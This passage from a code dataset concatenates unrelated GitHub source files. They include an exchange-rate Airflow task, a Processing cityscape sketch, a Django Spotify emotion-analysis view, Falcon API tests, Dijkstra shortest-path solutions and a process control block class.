symbols_to_search = [pair.split('/')[0] for pair in pairs]\n iter_start_date = today_utc - timedelta(days=365)\n iter_end_date = today_utc\n while symbols_to_search:\n symbols_str = ','.join(symbols_to_search)\n resp = request_date_range(iter_start_date.strftime(\"%Y-%m-%d\"),\n iter_end_date.strftime(\"%Y-%m-%d\"),\n base,\n symbols_str)\n if not resp:\n raise AirflowException('Exchange API has not returned data')\n put_rates_to_stage(db_conf, resp, base, symbols_to_search)\n symbols_left = resp[iter_start_date.strftime(\"%Y-%m-%d\")].keys()\n symbols_to_search = list(set(symbols_left) & set(symbols_to_search))\n print(symbols_to_search)\n if symbols_to_search:\n iter_end_date = iter_start_date - timedelta(days=1)\n iter_start_date = iter_end_date - timedelta(days=365)\n","repo_name":"dmitrii-listvin/store-exchangerate","sub_path":"dags/exchangerate/exchangerate.py","file_name":"exchangerate.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"21001113862","text":"import math \n\nbuildings1 = []\nbuildings2 = []\nbuildings3 = []\nbuildings4 = []\n\nmapTop = 0\nmapBottom = 0\nmapleft = 0\nmapRight = 0\nalleyway = 5\n\ndef setup():\n global mapTop, mapBottom, mapleft, mapRight\n # global buildings, buildings1\n size(601, 601, P3D)\n mapTop = -height\n mapBottom = height\n mapleft = 0\n mapRight = width\n \n camera(width/2.0, -height, (height/2.0) / tan(PI*30.0 / 180.0), width/2.0, height/10.0, 0, 0, 1, 0)\n createBuildings(middleVerticalStreet()[0], \"vertical\", buildings1, 20)\n createBuildings(middleVerticalStreet()[0], \"vertical\", buildings2, 20)\n createBuildings(middleHorizontalStreet()[0], \"horizontal\", buildings3, 20)\n createBuildings(middleHorizontalStreet()[0], \"horizontal\", buildings4, 20)\n \n \ndef draw():\n global buildings, buildings1\n background(255)\n stroke(0)\n\n # draw grid\n strokeWeight(1)\n showGrid()\n \n # draw street\n strokeWeight(5)\n line(*middleVerticalStreet()[0])\n line(*middleVerticalStreet()[1])\n line(*middleHorizontalStreet()[0])\n line(*middleHorizontalStreet()[1])\n \n # draw buildings\n strokeWeight(5)\n drawBuildings(middleVerticalStreet()[0], buildings1, \"left\")\n drawBuildings(middleVerticalStreet()[1], buildings2, \"right\")\n drawBuildings(middleHorizontalStreet()[0], buildings3, \"above\")\n drawBuildings(middleHorizontalStreet()[1], buildings4, \"below\")\n\n # camera\n camera(3*mouseX - width , 2*mouseY - height, 1*(height/2.0) / tan(PI*30.0 / 180.0), width/2.0, height/10.0, height/2, 0, 1, 0)\n\n\ndef showGrid():\n strokeWeight(1)\n x = 0\n while x < width :\n line(x, 0, 0, x, 0, height)\n # line(x, 0, -height, x, 0, height)\n x = x + 50\n \n # z = -height\n z = 0\n while z < height :\n line(0, 0, z, width, 0, z)\n z = z + 50\n \n strokeWeight(5)\n line(mapleft, 0, 0, mapRight, 0 , 0)\n \ndef middleVerticalStreet():\n # lineLeft = (width/2 - width/10, 0, -height, width/2 - width/10, 0, height)\n # lineRight = (width/2 + width/10, 0, -height, width/2 + width/10, 0, height)\n # lineLeft = (width/2 - width/10, 0, 0, width/2 - width/10, 0, height)\n # lineRight = (width/2 + width/10, 0, 0, width/2 + width/10, 0, height)\n # lineLeft = (width/2 - width/20, 0, 0, width/2 - width/20, 0, height)\n # lineRight = (width/2 + width/20, 0, 0, width/2 + width/20, 0, height)\n lineLeft = (width/2 - width/40, 0, 0, width/2 - width/40, 0, height)\n lineRight = (width/2 + width/40, 0, 0, width/2 + width/40, 0, height)\n \n return lineLeft, lineRight\n # line(*lineLeft)\n # line(*lineRight)\n\ndef middleHorizontalStreet():\n lineUp = (0, 0, height/2 - height/40, width, 0, height/2 - height/40)\n lineDown = (0, 0, height/2 + height/40, width, 0, height/2 + height/40)\n \n return lineUp, lineDown \n \ndef createBuildings(lineSegment, orientation, buildingArray=buildings1, amount=15):\n global buildings\n strokeWeight(5)\n # boxX = 50\n # boxY = 100\n # boxZ = 500\n \n # box(boxX, boxY, boxZ)\n \n # amount = 15\n \n # determine magnitude of line \n xAbsolute = abs(lineSegment[0]-lineSegment[3])\n yAbsolute = abs(lineSegment[1]-lineSegment[4])\n zAbsolute = abs(lineSegment[2]-lineSegment[5])\n lineMagnitude = math.sqrt(xAbsolute**2 + yAbsolute**2 + zAbsolute**2)\n\n\n # i = 0\n buildingMagnitude = 0 \n # while i < amount:\n while buildingMagnitude < lineMagnitude :\n \n boxX = int(random(10, height/10))\n boxY = int(random(10, height/10))\n boxZ = int(random(10, height/10))\n # boxX = 50\n # boxY = 50\n # boxZ = 50\n \n if orientation == \"horizontal\" :\n buildingMagnitude += boxX + alleyway\n # buildingMagnitude == boxZ + buildingMagnitude\n elif orientation == \"vertical\" :\n buildingMagnitude += boxZ + alleyway\n # buildingMagnitude == boxZ + buildingMagnitude\n # print buildingMagnitude\n \n if buildingMagnitude < lineMagnitude :\n building = [boxX, boxY, boxZ]\n buildingArray.append(building) \n \n # make skyscraper\n skyscraper = len(buildingArray)/2\n buildingArray[skyscraper][1] = int(random(60, height/2.5))\n \n \ndef drawBuildings(streetLine, buildingArray, side):\n buildings = buildingArray\n pushMatrix()\n \n for i in range(len(buildings)):\n \n if i == 0 :\n previousBuilding = [0, 0, 0]\n else:\n previousBuilding = buildings[i-1]\n \n building = buildings[i]\n \n boxX = building[0]\n boxY = building[1]\n boxZ = building[2]\n\n # pushMatrix()\n\n if side == \"left\" or side == \"right\":\n # moves buildings along the Z axis down the street\n translate(0, 0, previousBuilding[2]/2+ boxZ/2 + alleyway )\n # popMatrix()\n \n if side == \"left\":\n \n # # moves buildings along the Z axis down the street\n # translate(0, 0, previousBuilding[2]/2+ boxZ/2 + 5 )\n \n pushMatrix()\n \n # moves buildings against the street and adjusts height\n translate(streetLine[0] - boxX/2, -boxY/2, 0) \n \n # translate(0, boxY + height/100, 0)\n box(building[0], building[1], building[2])\n popMatrix()\n \n elif side == \"right\":\n # # moves buildings along the Z axis down the street\n # translate(0, 0, previousBuilding[2]/2+ boxZ/2 + 5 )\n \n pushMatrix()\n \n # moves buildings against the street and adjusts height\n translate(streetLine[0] + boxX/2, -boxY/2, 0) \n \n # translate(0, boxY + height/100, 0)\n box(building[0], building[1], building[2])\n popMatrix()\n \n elif side == \"above\" or side == \"below\":\n # moves buildings along the Z axis down the street\n translate(previousBuilding[0]/2+ boxX/2 + alleyway, 0, 0)\n # popMatrix()\n \n if side == \"above\":\n pushMatrix()\n \n # moves buildings against the street and adjusts height\n translate(0, -boxY/2, streetLine[2] - boxZ/2) \n \n # translate(0, boxY + height/100, 0)\n box(building[0], building[1], building[2])\n popMatrix()\n \n elif side == \"below\":\n pushMatrix()\n \n # moves buildings against the street and adjusts height\n translate(0, -boxY/2, streetLine[2] + boxZ/2) \n \n # translate(0, boxY + height/100, 0)\n box(building[0], building[1], building[2])\n popMatrix()\n \n popMatrix()\n \n \n \n \n \n \n \n \n","repo_name":"andrewdonato/processing-projects","sub_path":"cityscape/cityscape.pyde","file_name":"cityscape.pyde","file_ext":"pyde","file_size_in_byte":7240,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"56"} +{"seq_id":"70650891056","text":"# -*- coding: utf-8 -*-\nfrom ssf_api import *\nimport pickle\nimport io\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\nimport logging\n#import utilities\n#log = utilities.setup_logger()\n\n\ndef create_rawData_pickles(dataLocation):\n\n # Walks through the folder to get names/strings of all the files\n FileList = folderWalk(dataLocation)\n\n # Processed File count\n fileNum = 0\n\n # Target location to store processed data\n createDirectory(\"./DATA/PROCESSED-DATA/collection/\")\n\n # Catches all the files which report exception while processing, along with the exception\n errs = \"\\n{:<100} {:<100}\".format('FileName','Exception')\n\n\n for rawFilePath in FileList:\n\n try:\n # sentenceList : list of ssf_api.Sentence objects\n # globalWordList : list of ssf_api.Word objects\n sentenceList, globalWordList = extractSSFannotations(rawFilePath)\n\n # Get the SSFInfo object\n ssfinfo = SSFInfo(sentenceList, globalWordList)\n\n # Populates the ssfinfo.sentenceList[indx].nodeDict['key'].childList\n # For all the indxs in sentenceList and key in nodeDict of that sentence\n createChildList(ssfinfo)\n\n except Exception as e:\n errs += \"\\n{:<100} {:<100}\".format(os.path.basename(rawFilePath), e)\n continue\n\n # If the file pointed by rawFilePath doesn't contain any sentence\n if(sentenceList == None):\n loggin.debug(\"No sentence in\"+rawFilePath+\"Continuing\")\n continue\n\n # Pickle the ssinfo Object into the collections\n pickle.dump(ssfinfo, open(\"./DATA/PROCESSED-DATA/collection/\"+rawFilePath.split('/')[-1]+'.pkl','w'))\n fileNum+=1\n \n #exportModel(\"PROCESSED-DATA/annotatedData\",discourseFileCollection)\n logging.info(\"Processed %d raw files correctly\",fileNum)\n logging.info(\"The following raw files could not be processed :\"+errs)\n\n\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n logging.critical(\"Please give RAW-data folder's location\")\n logging.critical(\"\")\n option = raw_input(\"\\n\\tShould ./DATA/RAW-DATA/ be used as the dir? [Y|n]\")\n if option == 'y' or option == 'Y':\n dataLocation = './DATA/RAW-DATA/'\n else:\n logging.critical(\"Please re-run the script with command line arguments\")\n exit()\n else:\n dataLocation = sys.argv[1]\n \n create_rawData_pickles(dataLocation)\n","repo_name":"akshatcx/coreference_resolution_cl","sub_path":"scripts/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"56"} +{"seq_id":"71793921135","text":"from django.contrib.auth.models import User\nfrom django.http import JsonResponse\n\nfrom emotions.serializers import UserSerializer, RegisterUserSerializer, SongSerializer, PlaylistSerializer\nfrom emotions.models import Song, Playlist\n\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom rest_framework import viewsets\nfrom rest_framework import permissions\nfrom rest_framework.generics import RetrieveAPIView, CreateAPIView\n\nimport os\nimport json\nimport spotipy\nfrom spotipy.oauth2 import SpotifyClientCredentials\nimport lyricsgenius as lg\nimport re\nfrom transformers import pipeline\nimport collections\nimport pandas as pd\n\nspotify_client_id = os.environ['SPOTIPY_CLIENT_ID']\nspotify_secret = os.environ['SPOTIPY_CLIENT_SECRET']\nspotipy_redirect_uri = os.environ['SPOTIPY_REDIRECT_URI']\ngenius_access_token = os.environ['GENIUS_ACCESS_TOKEN']\nuser_id = 'spotify:user:22gothp7kyvmsh7ryebt7vjqq'\n\nsp = spotipy.Spotify(client_credentials_manager=SpotifyClientCredentials())\nge = lg.Genius(genius_access_token)\n\ndebug = False\nemotion = None\nif debug:\n emotion = pipeline('sentiment-analysis', model='arpanghoshal/EmoRoBERTa')\n def get_emotion_label(text):\n return(emotion(text)[0]['label'])\n\n# Create your views here.\n@api_view(['POST'])\ndef test(request):\n try:\n spotify_playlist_id = request.data['link']\n playlist = sp.user_playlist_tracks(user_id, spotify_playlist_id)\n tracks = []\n for item in playlist['items']:\n track_id = item['track']['id']\n string = (item['track']['name']).split(\"(\", 1)\n track_name = string[0]\n track_artist = item['track']['artists'][0]['name']\n tracks.append((track_id, track_name, track_artist))\n\n playlistDDict = collections.defaultdict(int)\n\n for id, title, artist in tracks:\n if Song.objects.filter(id=id):\n song = Song.objects.filter(id=id)\n for key in song[0].emotions:\n playlistDDict[key] += song[0].emotions[key]\n continue\n try:\n if debug:\n song = ge.search_song(title, artist)\n songLyrics = song.lyrics\n modifiedSongLyrics = re.sub('\\[.+\\]', '', songLyrics)\n many_strings = re.split('\\n', modifiedSongLyrics)\n \n songDF = pd.DataFrame(many_strings)\n songDF.rename(columns = {0:'text'}, inplace = True)\n songDF['emotion'] = songDF['text'].apply(get_emotion_label)\n\n songJSONstring = songDF.to_json()\n songJSON = json.loads(songJSONstring)\n songCounts = collections.Counter(songJSON['emotion'].values())\n songDict = dict(songCounts)\n\n for key in songDict:\n playlistDDict[key] += songDict[key]\n \n songData = {\"id\": id, \"title\": title, \"artist\": artist, \"emotions\": songDict}\n\n serializerSong = SongSerializer(data=songData)\n if serializerSong.is_valid():\n serializerSong.save()\n continue\n except Exception as e:\n return JsonResponse({\"error\": str(e)}, status=400)\n \n songs = [song[0] for song in tracks]\n playlistDict = dict(playlistDDict)\n\n data = {\"id\": spotify_playlist_id + \"7\", \"songs\": songs, \"emotions\": playlistDict}\n\n serializerPlaylist = PlaylistSerializer(data=data)\n if serializerPlaylist.is_valid():\n serializerPlaylist.save()\n return Response(data)\n except Exception as e:\n return JsonResponse({\"error\": str(e)}, status=400)\n\n@api_view(['GET'])\ndef getPlaylists(request):\n playlists = Playlist.objects.all()\n serializer = PlaylistSerializer(playlists, many=True)\n return Response(serializer.data)\n\n@api_view(['GET'])\ndef getSongs(request):\n songs = Song.objects.all()\n serializer = SongSerializer(songs, many=True)\n return Response(serializer.data)\n\n@api_view(['POST'])\ndef addSongs(request):\n if isinstance(request.data['data'], str):\n data = json.loads(request.data['data'])\n else:\n data = request.data['data']\n serializer = SongSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n\nclass UserViewSet(viewsets.ModelViewSet):\n queryset = User.objects.all().order_by('-date_joined')\n serializer_class = UserSerializer\n permission_classes = [permissions.IsAuthenticated]\n\nclass UserAPIView(RetrieveAPIView):\n permission_classes = [permissions.AllowAny]\n serializer_class = UserSerializer\n def get_object(self):\n return self.request.user\n\nclass RegisterUserAPIView(CreateAPIView):\n permission_classes = [permissions.AllowAny]\n serializer_class = RegisterUserSerializer\n\n","repo_name":"slegaspi19/musiFeel","sub_path":"backend/emotions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"32997723070","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nARENA_SIZE = 1.2\n\narena = 2 * ARENA_SIZE * np.array([[0., 0.], [0., 1.], [1., 1.], [1., 0.], [0., 0.]]).T - ARENA_SIZE\nprint(arena)\nred_home = np.array([[0.8, 1.2, 1.2, 0.8], [0.8, 0.8, 1.2, 1.2]])\nblue_home = (red_home.T + np.array([0., -2., ])).T\n\ndef plot_scanning_path(ax, R=1., step_multiple=1., start_multiple=0.7):\n ax.set_aspect('equal')\n ax.plot(*arena, color='darkgrey', linewidth=3)\n ax.tick_params(axis='both', which='both', left=False, bottom=False,\n labelbottom=False, labelleft=False)\n\n step = step_multiple * R\n # start = start_multiple * R\n start = 0.4\n X = np.arange(start, ARENA_SIZE / 2, step)\n Y = np.arange(start, ARENA_SIZE, step)\n\n for x in X:\n for y in Y:\n circle = plt.Circle((x, y), radius=R, alpha=0.1)\n ax.add_artist(circle)\n\n circle = plt.Circle((ARENA_SIZE-x, y), radius=R, alpha=0.1, color='tab:red')\n ax.add_artist(circle)\n\n path_xs = np.repeat(X, len(Y))\n path_ys = np.concatenate([Y[::(-1)**(i%2)] for i in range(len(X))])\n\n ax.plot(path_xs, path_ys, 'o-', color='tab:blue', linewidth=2)\n ax.plot(ARENA_SIZE - path_xs, path_ys, 'o-', color='tab:red', linewidth=2)\n\n\ndef plot_scanning_waypoints(ax, waypoints, radius=1., plot_reflection=True):\n ax.set_xlim(-1.4, 1.4)\n ax.set_ylim(1.4, -1.4)\n ax.set_aspect('equal')\n ax.plot(*arena, color='darkgrey', linewidth=3)\n ax.tick_params(axis='both', which='both', left=False, bottom=False,\n labelbottom=False, labelleft=False)\n\n ax.add_artist(plt.Polygon(red_home.T, color='tab:red', alpha=0.2))\n ax.add_artist(plt.Polygon(blue_home.T, color='tab:blue', alpha=0.2))\n\n for x, y in waypoints:\n circle = plt.Circle((x, y), radius=radius, color='tab:red', alpha=0.2)\n ax.add_artist(circle)\n if plot_reflection:\n circle = plt.Circle((x, - y), radius=radius, alpha=0.1, color='tab:blue')\n ax.add_artist(circle)\n\n ax.plot(*waypoints.T, 'o-', color='tab:red', linewidth=2)\n if plot_reflection:\n blue_waypoints = waypoints * np.array([1, -1])\n ax.plot(*blue_waypoints.T, 'o-', color='tab:blue', linewidth=2)\n\n\n# ROWS = 3\n# COLS = 3\n#\n# fig, axes = plt.subplots(nrows=ROWS, ncols=COLS)\n#\n# rs, steps = np.mgrid[0.4:1:1j*ROWS, 0.7:1.3:1j * COLS]\n# for i, (ax, r, step) in enumerate(zip(axes.flat, rs.flat, steps.flat)):\n# plot_scanning_path(ax, r, step_multiple=step)\n#\n# if i % ROWS == 0:\n# ax.set_ylabel(f'$R={r}$m', fontsize=14)\n#\n# if i // COLS == 0:\n# ax.set_title(f'step size=${step}R$', fontsize=14)\n\nwaypoints = np.array([\n [1., 1.],\n [.8, 1.],\n [.6, 1.],\n])\n\n\nfig, ax = plt.subplots()\nplot_scanning_waypoints(ax, waypoints, radius=0.5, plot_reflection=True)\nplt.show()","repo_name":"TobyBoyne/idp-simulation","sub_path":"report/scanning_diagram.py","file_name":"scanning_diagram.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"56"} +{"seq_id":"32269311291","text":"import pytest\nimport falcon\nimport datetime\n\nfrom app.model.db import BookEntity\nfrom .base_api_test import BaseApiTest\n\n\ndef data():\n return {\n 'title': 'Book Title',\n 'author': 'Book Author',\n 'published_date': datetime.date.fromisocalendar(2020, 1, 2),\n 'isbn': '1234567890',\n 'page_count': 100,\n 'cover_url': 'http://www.someurl.pl/book/cover?size=small',\n 'language': 'pl'\n }\n\n\nclass TestBookListGet(BaseApiTest):\n URL = '/api/books'\n\n def setup_class(cls):\n super().setup_class(cls)\n cls.book = BookEntity(book_id=None, **data())\n cls.book_repository.insert_book(cls.book)\n\n def test_with_book(self):\n res = self.client.simulate_get(self.URL)\n assert res.status == falcon.HTTP_200\n assert res.json == [self.book.as_dict()]\n\n def test_filter_by_author(self):\n res = self.client.simulate_get(f'{self.URL}?author={self.book.author}')\n assert res.status == falcon.HTTP_200\n assert res.json == [self.book.as_dict()]\n\n res = self.client.simulate_get(f'{self.URL}?author={self.book.author}asd')\n assert res.status == falcon.HTTP_200\n assert res.json == []\n\n def test_filter_by_title(self):\n res = self.client.simulate_get(f'{self.URL}?title={self.book.title}')\n assert res.status == falcon.HTTP_200\n assert res.json == [self.book.as_dict()]\n\n res = self.client.simulate_get(f'{self.URL}?author={self.book.title}asd')\n assert res.status == falcon.HTTP_200\n assert res.json == []\n\n def test_filter_by_date(self):\n date = (self.book.published_date + datetime.timedelta(days=10)).strftime('%Y-%m-%d')\n res = self.client.simulate_get(f'{self.URL}?published_date__to={date}')\n assert res.status == falcon.HTTP_200\n assert res.json == [self.book.as_dict()]\n\n date = (self.book.published_date - datetime.timedelta(days=10)).strftime('%Y-%m-%d')\n res = self.client.simulate_get(f'{self.URL}?published_date__from={date}')\n assert res.status == falcon.HTTP_200\n assert res.json == [self.book.as_dict()]\n\n date = (self.book.published_date - datetime.timedelta(days=10)).strftime('%Y-%m-%d')\n print(date)\n res = self.client.simulate_get(f'{self.URL}?published_date__to={date}')\n assert res.status == falcon.HTTP_200\n assert res.json == []\n\n def test_filter_by_language(self):\n res = self.client.simulate_get(f'{self.URL}?language={self.book.language}')\n assert res.status == falcon.HTTP_200\n assert res.json == [self.book.as_dict()]\n\n res = self.client.simulate_get(f'{self.URL}?language=qw')\n assert res.status == falcon.HTTP_200\n assert res.json == []","repo_name":"pberezow/zadanie-rekrutacyjne-backend","sub_path":"tests/endpoints/test_book_list_get.py","file_name":"test_book_list_get.py","file_ext":"py","file_size_in_byte":2774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"34707107783","text":"# 전보\n\n# 나의 풀이\nimport heapq\n\nINF = int(1e9)\n\nn, m, start = map(int, input().split())\ngraph = [[] for _ in range(n + 1)]\n\nfor _ in range(m):\n fromNode, toNode, dist = map(int, input().split())\n graph[fromNode].append((toNode, dist))\n\ndef dijkstra(graph, start, end):\n distance = [INF] * (n + 1)\n\n q = []\n heapq.heappush(q, (0, start))\n distance[start] = 0\n\n while q:\n dist, toNode = heapq.heappop(q)\n\n if distance[toNode] < dist:\n continue\n \n for node in graph[toNode]:\n cost = dist + node[1]\n if cost < distance[node[0]]:\n distance[node[0]] = cost\n heapq.heappush(q, (node[1], node[0]))\n\n return distance[end]\n\ncount = 0\nresult = 0\nfor i in range(1, n + 1):\n dist = dijkstra(graph, start, i)\n if dist != INF:\n count += 1\n result = max(result, dist)\n\nprint(count, result)\n\n\n# 해설\nimport heapq\nimport sys\n\ninput = sys.stdin.readline\nINF = int(1e9)\n\nn, m, start = map(int, input().split())\ngraph = [[] for i in range(n + 1)]\ndistance = [INF] * (n + 1) \n\nfor _ in range(m):\n x, y, z = map(int, input().split())\n graph[x].append((y, z))\n\ndef dijkstra(start):\n q = []\n\n heapq.heappush(q, (0, start))\n distance[start] = 0\n\n while q:\n dist, now = heapq.heappop(q)\n if distance[now] < dist:\n continue\n\n for i in graph[now]:\n cost = dist + i[1]\n if cost < distance[i[0]]:\n distance[i[0]] = cost\n heapq.heappush(q, (cost, i[0]))\n\ndijkstra(start)\n\ncount = 0\nmax_distance = 0\n\nfor d in distance:\n if d != INF:\n count += 1\n max_distance = max(max_distance, d)\n\nprint(count - 1, max_distance) # 시작 노드는 제외해야 함\n\n\n# 나는 모든 경우에 대해 다익스트라 알고리즘을 수행해야 한다고 생각했었다. 사실은 다익스트라 한 번으로도 가능했다.\n# 왜 모든 경우에 대해 다익스트라 알고리즘을 수행?\n# -> 그리디하다는 생각이 하나의 목적지에 대한 경로만 구한다고 생각했다. -> 사실은 모든 목적지에 대해 구하고 선택하는 것이었다.\n# -> 다익스트라 알고리즘과 플로이드 워셜 알고리즘의 차이를 다르게 생각했던것 같다.\n# -> 다익스트라 알고리즘은 그리디 방식으로 거리를 구하고 플로이드 워셜 알고리즘은 다이나믹 프로그래밍을 이용한다.\n# -> 다익스트라 알고리즘은 출발지가 정해져있지만, 플로이드 워셜 알고리즘은 모든 출발지를 고려한다. (이 점을 놓치고 있었다)\n# -> 즉, 다익스트라 알고리즘은 출발지 1 - 목적지 n, 플로이드 워셜 알고리즘은 출발지 n - 목적지 n 이다.","repo_name":"aaronsatae/study-algorithm","sub_path":"dongbinBook/shortest-path-2.py","file_name":"shortest-path-2.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"24364211111","text":"import unittest\n\nfrom unittest import mock\nfrom stoqlib.lib.component import remove_utility, get_utility, provide_utility\nfrom kiwi.ui.widgets.label import ProxyLabel\nfrom stoqlib.lib.interfaces import IAppInfo\nfrom stoqlib.lib.settings import get_settings\n\nfrom stoq.main import main\nfrom stoq.gui.shell.bootstrap import ShellBootstrap\n\n\nclass TestMain(unittest.TestCase):\n def setUp(self):\n self._mocks = []\n\n self._iappinfo = get_utility(IAppInfo)\n # Shell will provide this utility\n remove_utility(IAppInfo)\n\n # If the locale is changed here, gui tests will break\n mocked = mock.patch.dict(get_settings()._root, clear=True)\n self._mocks.append(mocked)\n\n # Do not show the splash screen during the tests\n mocked = mock.patch('stoq.lib.gui.widgets.splash.show_splash',\n new=lambda: None)\n self._mocks.append(mocked)\n\n # If a dependency is missing, avoid showing an error message\n # or else jenkins will hang\n mocked = mock.patch('stoq.lib.dependencies.DependencyChecker._error',\n new=lambda *args, **kwargs: None)\n self._mocks.append(mocked)\n\n for mocked in self._mocks:\n mocked.start()\n\n def tearDown(self):\n provide_utility(IAppInfo, self._iappinfo, replace=True)\n # Shell.bootstrap calls\n # ProxyLabel.replace('$CURRENCY', get_localeconv()['currency_symbol'])\n # and that will break uitests\n if '$CURRENCY' in ProxyLabel._label_replacements:\n del ProxyLabel._label_replacements['$CURRENCY']\n\n for mocked in self._mocks:\n mocked.stop()\n\n def test_shell_bootstrap(self):\n options = mock.Mock()\n bootstrap = ShellBootstrap(options=options, initial=True)\n mocks = []\n # This will fail since testsuit already setup it\n mocks.append(\n mock.patch.object(bootstrap, '_setup_gobject', new=lambda: None))\n # This will change the locale of all the tests that come after it,\n # making a lot of them fail\n mocks.append(\n mock.patch.object(bootstrap, '_set_user_locale', new=lambda: None))\n\n for mocked in mocks:\n mocked.start()\n\n try:\n bootstrap.bootstrap()\n finally:\n for mocked in mocks:\n mocked.stop()\n\n @mock.patch('stoq.gui.shell.bootstrap.boot_shell')\n def test_main(self, boot_shell):\n main(['stoq'])\n boot_shell().main.assert_called_once_with(None, None)\n boot_shell.reset_mock()\n\n main(['stoq', 'payable'])\n boot_shell().main.assert_called_once_with('payable', None)\n boot_shell.reset_mock()\n\n main(['stoq', 'payable/'])\n boot_shell().main.assert_called_once_with('payable', None)\n boot_shell.reset_mock()\n\n main(['stoq', 'payable', 'AddPayment'])\n boot_shell().main.assert_called_once_with('payable', 'AddPayment')\n boot_shell.reset_mock()\n\n with self.assertRaises(SystemExit):\n main(['stoq', '--version'])\n\n with self.assertRaisesRegex(\n SystemExit,\n r\"'no-such-app' is not an application. \"\n r\"Valid applications are: \\[[a-z,\\' ]+\\]\"):\n main(['stoq', 'no-such-app'])\n","repo_name":"stoq/stoq","sub_path":"stoq/gui/test/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":3332,"program_lang":"python","lang":"en","doc_type":"code","stars":302,"dataset":"github-code","pt":"56"} +{"seq_id":"37463658383","text":"from hardware.cpu import TaskStateSegment\nimport logging\nlog= logging.getLogger('os')\n\nCREATED, RUNNING, RUNNABLE, BLOCKED, TERMINATED= range(5)\n\nclass PCB:\n '''Process Control Block'''\n \n def __init__(self, pid, start_address, size, pc, sched_info, changestate_callback=lambda pcb, oldstate, newstate:None):\n self.pid= pid #PID\n self.start_address= start_address #of program in memory\n self.size= size #of program in memory\n self.tss= TaskStateSegment() #cpu context identifier\n self.tss.PC= pc #address of first instruction\n self.sched_info=sched_info #sheduling info\n self.changestate_callback= changestate_callback #will be called on state change\n self.state= CREATED\n self.changeState( RUNNABLE, just_started= True )\n\n def changeState( self, new_state, just_started= False):\n assert new_state in (RUNNING, RUNNABLE, BLOCKED, TERMINATED)\n if new_state == RUNNING:\n assert self.state == RUNNABLE\n if new_state == RUNNABLE:\n assert (self.state in (BLOCKED,RUNNING)) or just_started\n if new_state == BLOCKED:\n assert self.state == RUNNING\n if new_state == TERMINATED:\n assert self.state in (RUNNABLE, BLOCKED)\n self.changestate_callback( self, self.state, new_state)\n self.state= new_state\n\n def __repr__(self):\n return \"PCB \"+str(self.pid)\n","repo_name":"goncalopp/cpu_scheduler_emu","sub_path":"operating_system/pcb.py","file_name":"pcb.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"56"} +{"seq_id":"39074029443","text":"import json\nimport logging\n\nfrom aws_lambda_powertools import Tracer # type: ignore\nfrom edit import edit_user_group # type: ignore\nfrom models.api_response import LambdaResponse, Message\nfrom models.users import UserGroupsApiEditInput\nfrom pydantic import ValidationError\n\nfrom database import init_db\n\ntracer = Tracer(service=\"edit_user_group\")\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\nlogging.basicConfig(level=logging.DEBUG)\n\nlogger = logging.getLogger(__name__)\n\nCONNECTION = None\n\n\n@tracer.capture_lambda_handler(capture_response=False)\ndef lambda_handler(event, context):\n global CONNECTION\n\n if CONNECTION is None:\n CONNECTION = init_db()\n\n try:\n owner_id = event[\"requestContext\"][\"authorizer\"][\"lambda\"][\"sub\"]\n payload = json.loads(event[\"body\"])\n user_group_id = event[\"pathParameters\"][\"id\"]\n m = UserGroupsApiEditInput.parse_obj(payload)\n response = edit_user_group(owner_id, user_group_id, m, CONNECTION)\n logger.info(response)\n except ValidationError:\n logger.error(\"Validation input error\")\n return LambdaResponse(\n statusCode=400, body=(Message(message=\"Bad request\")).json()\n ).dict()\n\n return response\n","repo_name":"hydocloud/backend","sub_path":"microservices/user/src/edit_user_group/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"7905803881","text":"from enum import Enum\n\n\nclass MessageType(Enum):\n SessionCreation = 0\n SessionModification = 1\n SessionDelete = 2\n\n\nclass XyzTimerUnit(Enum):\n TimerDeactivated = 0\n MultiplesOfHours = 1\n MultiplesOfMinutes = 2\n MultiplesOfSeconds = 3\n\n\nclass SRYP(Enum):\n SessionManagement = 0\n\n\nclass YEW(Enum):\n YewXyzTimer = 0x8\n YewAlwaysOnSession = 0x9\n\n\nclass XyzTimer:\n def __init__(self):\n self.timer_unit = XyzTimerUnit.TimerDeactivated\n self.timer_value = 0\n\n def set(self, unit, amount):\n self.timer_unit = unit\n self.timer_value = amount\n\n def encode(self, data):\n data.append(YEW.YewXyzTimer.value)\n temp = self.timer_unit.value << 5\n if self.timer_unit != XyzTimerUnit.TimerDeactivated:\n if self.timer_value <= 0x1F: # 5 bits max range\n temp |= (self.timer_value & 0x1F)\n else:\n print(\"XYZ timer value out of range. Encoding max value\")\n temp |= 0x1F\n data.append(temp)\n\n\nclass SessionModificationCommand:\n def __init__(self, session_id, transaction_id):\n self.type = MessageType.SessionModification\n self.session_id = session_id\n self.transaction_id = transaction_id\n self.has_xyz_timer = False\n self.xyz_timer = XyzTimer()\n self.has_pqvl = False\n self.pvql = 0\n self.sryp_id = SRYP.SessionManagement\n\n def update_xyz_timer(self, unit, amount):\n self.has_xyz_timer = True\n self.xyz_timer.set(unit, amount)\n\n def update_pqvl(self, value):\n self.has_pqvl = True\n self.pvql = value\n\n def encode(self, data):\n 